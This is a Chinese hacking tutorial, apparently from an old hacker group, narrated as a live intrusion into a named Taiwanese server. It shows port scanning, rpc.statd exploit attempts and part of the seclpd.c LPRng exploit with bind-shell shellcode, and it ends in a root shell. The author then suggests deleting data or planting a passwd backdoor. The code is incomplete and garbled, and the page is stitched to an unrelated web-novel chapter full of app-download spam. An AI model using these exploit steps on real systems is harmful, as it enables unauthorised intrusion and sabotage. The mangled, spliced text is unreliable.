我写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕UNIX下面的一个小小的服务进程(LPD:网络打印服务)的攻击而进行的。
让俺慢慢道来…..
咳…咳…先给我上茶!(什么?!没有?俺不说了!!)呵呵……开开玩笑,言归正传.首先确定目标,随便找上台湾一个搜索引擎。随便挑一个吧!假设是:www.fbi.gov.tw。^__^
先让俺看看是不是连得上:
C:\pingwww.fbi.gov.tw
Pingingwww.fbi.gov.tw[202.106.184.200]with32bytesofdata:
Replyfrom202.106.184.200:bytes=32time=541msTTL=244
Replyfrom202.106.184.200:bytes=32time=620msTTL=244
Replyfrom202.106.184.200:bytes=32time=651msTTL=244
Replyfrom202.106.184.200:bytes=32time=511msTTL=244
Pingstatisticsfor202.106.184.200:
Packets:Sent=4,Received=4,Lost=0(0%loss),
Approximateroundtriptimesinmilli-seconds:
Minimum=511ms,Maximum=651ms,Average=580ms
嘻嘻—不但连得上,速度还不错……m.XiaoShuo530.Com
先tel***看看banner:
C:\>tel***www.fbi.gov.tw
遗失对主机的连接。
哈哈……看来把tel***服务给shut掉了!再试试ftp
C:\>ftpwww.fbi.gov.tw
Connectedtowww.fbi.gov.tw.
220fbi-wwwFTPserver(Versionwu-2.6.1(1)WedAug905:54:50EDT2000)ready.
User(www.fbi.gov.tw:(none)):
呵~~wu-2.6.1看来有点眉目了。这台机器像是大名鼎鼎的…………对!RedHat7.0!没错就是她了!首先必须确认一下,连上俺的跳板:
C:\>tel***xxx.xxx.xxx.xxx
RedHatLinuxrelease7.0(Guinness)
Kernel2.2.16-22smponani686
login:fetdog
Password:
bash-2.04$
呵呵~~这是我在台湾的一台跳板。RH7的哦!等下我就会告诉你们拿这些肉鸡办法……拿上nmap扫描器,看看其中的奥妙~~~
bash-2.04$nmap-sT-Owww.fbi.gov.tw
StartingnmapV.2.54BETA7(www.insecure.org/nmap/)
WARNING!Thefollowingfilesexistandarereadable:/usr/local/sha
-servicesand./nmap-services.Iamchoosing/usr/local/share/nmap/
sforsecurityreasons.setNMAPDIR=.togiveprioritytofilesin
irectory
Interestingportson(www.fbi.gov.tw):
(The1520portsscannedbutnotshownbelowareinstate:closed)
PortStateService
25/tcpopensmtp
79/tcpopenfinger
80/tcpopenhttp
111/tcpopensunrpc
113/tcpopenauth
443/tcpopenhttps
513/tcpopenlogin
514/tcpopenshell
515/tcpopenprinter
587/tcpopensubmission
1024/tcpopenkdm
TCPSequencePrediction:Class=randompositiveincrements
Difficulty=3247917(Goodluck!)
Remoteoperatingsystemguess:Linux2.1.122-2.2.16
Nmaprun***pleted--1IPaddress(1hostup)scannedin9seconds
恰恰!!打开的端口还挺多的嘛!不错……不错……。79/tcpfinger?呵呵~先看看这个,不过linux没有finger用户列表这个漏洞,不管它俺先看看有没有倒霉鬼。
[email protected]
[www.fbi.gov.tw]
Nooneloggedon.
shit!怎么会没人!开门!给我开门!:(……再看看111/tcpsunrpc。嘿嘿……近来rpc漏洞风行,不知道RH7这个东东会不会有?管它呢,先看看再说!
bash-2.04$rpcinfo-pwww.fbi.gov.tw
programversprotoportservice
1000002tcp111rpcbind
1000002udp111rpcbind
1000211udp1024nlockmgr
1000213udp1024nlockmgr
1000241udp1025status
1000241tcp1024status
看来有rpc.statd服务。等俺来看看能不能远程溢出拿个rootshell。哈哈!这个rpc.statd远程溢出是我在hack.co.za找到的。等俺先来看看帮助。嘻嘻~~
bash-2.04$./statdx-h
statdxbyron1n
Usage:stat[-t][-pport][-aaddr][-llen]
[-ooffset][-wnum][-ssecs][-dtype]
-tattackatcpdispatcher[udp]
-prpc.statdservesrequestson[query]
-athestackaddressofthebufferis
-lthelengthofthebufferis[1024]
-otheoffsettoreturntois[600]
-wthenumberofdwordstowipeis[9]
-ssettimeoutinsecondsto[5]
-duseahardcoded
Availabletypes:
0Redhat6.2(nfs-utils-0.1.6-2)
1Redhat6.1(knfsd-1.4.7-7)
2Redhat6.0(knfsd-1.2.2-4)
看来并不支持RH7。怎么办??让俺把0-2全部试试看再说!start……
bash-2.04$stat-d0www.fbi.gov.tw
buffer:0xbffff314length:999(+str/+nul)
target:0xbffff718new:0xbffff56c(offset:600)
wiping9dwords
Failed-statdreturnedres_stat:(failure)state:21
哈哈受到挫折,再试……
bash-2.04$stat-d1www.fbi.gov.tw
buffer:0xbffff314length:999(+str/+nul)
target:0xbffff718new:0xbffff56c(offset:600)
wiping9dwords
Failed-statdreturnedres_stat:(failure)state:21
一样!继续……
bash-2.04$stat-d1www.fbi.gov.tw
buffer:0xbffff314length:999(+str/+nul)
target:0xbffff718new:0xbffff56c(offset:600)
wiping9dwords
Failed-statdreturnedres_stat:(failure)state:21
我烤!!烤烤烤!rpc.statd行不通啊!让我想想看……RH7应该有个远程溢出……好像是lp服务造成的。让俺去找找看。哈哈~~找到了……“seclpd.c”应该是这个东东了。以下程序也可以在黑盟下载。
—————以下代码仅供教学使用,决不能用来进行恶意攻击—————
/*
*Wel***etohttp://hlc.***root.***/
*Run:./SEClpdvictimbrute-ttype
*Tryfirst./SEClpdvictim-t0thentrythebrute.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#defineADDRESS_BUFFER_SIZE32+4
#defineAPPEND_BUFFER_SIZE52
#defineFORMAT_LENGTH512-8
#defineNOPCOUNT200
#defineSHELLCODE_COUNT1030
#defineDELAY50000/*usecs*/
#defineOFFSET_LIMIT5000
charshellcode[]=
&"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80&"
&"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8&"
&"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89&"
&"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0&"
&"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd&"
&"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9&"
&"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75&"
&"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08&"
&"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh&";
哈哈~~brute破解。看你出不出shell!现在要等上一会儿……去泡杯coffee慢慢来。(什么!没coffee?tea!这个也行!)…………过了大约一杯coffee的时间。也就是5-8分钟左右,就会有结果了。(什么!什么!5-8分钟你喝了5杯!我倒~~~)……出来了。哈哈~~
-[+]shelllocatedonwww.fbi.gov.tw
-[+]EnterCommandsatwill
LinuxFBI.WWW2.2.16-22smp#1SMPTueAug2216:39:21EDT2000i686unknown
uid=0(root)gid=7(lp)
Well……哈哈~uid=0(root)哇哈哈哈哈…………先在你是root啦!可以为所欲为了~~把它的东西全部删了~~哈哈……太过火了~~还是在passwd中加个后门算了~~至于怎么加,这就不在本文的范围内了……^___^
GoodLuck………………
WrittenByGoGofromH.L.C 有的人死了,但没有完全死……
无尽的昏迷过后,时宇猛地从床上起身。想要看最新章节内容,请下载爱阅小说app,无广告免费阅读最新章节内容。网站已经不更新最新章节内容,已经爱阅小说APP更新最新章节内容。
他大口的呼吸起新鲜的空气,胸口一颤一颤。
迷茫、不解,各种情绪涌上心头。
这是哪?
随后,时宇下意识观察四周,然后更茫然了。
一个单人宿舍?
就算他成功得到救援,现在也应该在病房才对。
还有自己的身体……怎么会一点伤也没有。
带着疑惑,时宇的视线快速从房间扫过,最终目光停留在了床头的一面镜子上。
镜子照出他现在的模样,大约十七八岁的年龄,外貌很帅。
可问题是,这不是他!下载爱阅小说app,阅读最新章节内容无广告免费
之前的自己,是一位二十多岁气宇不凡的帅气青年,工作有段时间了。
而现在,这相貌怎么看都只是高中生的年纪……
这个变化,让时宇发愣很久。
千万别告诉他,手术很成功……
身体、面貌都变了,这根本不是手术不手术的问题了,而是仙术。
他竟完全变成了另外一个人!
难道……是自己穿越了?
除了床头那摆放位置明显风水不好的镜子,时宇还在旁边发现了三本书。
时宇拿起一看,书名瞬间让他沉默。
《新手饲养员必备育兽手册》
《宠兽产后的护理》
《异种族兽耳娘评鉴指南》
时宇:???
前两本书的名字还算正常,最后一本你是怎么回事?
“咳。”
时宇目光一肃,伸出手来,不过很快手臂一僵。
就在他想翻开第三本书,看看这究竟是个什么东西时,他的大脑猛地一阵刺痛,大量的记忆如潮水般涌现。
冰原市。
宠兽饲养基地。
实习宠兽饲养员。网站即将关闭,下载爱阅app为您提供大神铁血悍馬H8的教你简单的黑客人门技术
御兽师?
章节错误,点此报送(免注册),
报送后维护人员会在两分钟内校正章节内容,请耐心等待